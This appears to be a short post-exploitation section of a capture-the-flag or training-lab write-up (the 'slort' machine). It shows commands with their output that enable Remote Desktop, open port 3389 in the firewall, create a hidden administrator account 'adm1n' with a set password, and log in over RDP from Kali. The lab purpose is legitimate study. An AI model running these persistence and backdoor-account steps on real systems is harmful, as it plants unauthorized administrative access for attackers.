Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as the administrator
user after compromising the target system.
C:\WINDOWS\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
C:\WINDOWS\system32>netsh firewall add portopening TCP 3389 "Remote Desktop"
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Ok.
C:\WINDOWS\system32> net user /ADD adm1n Qwer1234
net user /ADD adm1n Qwer1234
The command completed successfully.
C:\WINDOWS\system32> net localgroup Administrators /ADD adm1n
net localgroup Administrators /ADD adm1n
The command completed successfully.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ xfreerdp /u:adm1n /p:'Qwer1234' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0
RDP
Scheduled Tasks
Backup
every 5 minutes
XAMPP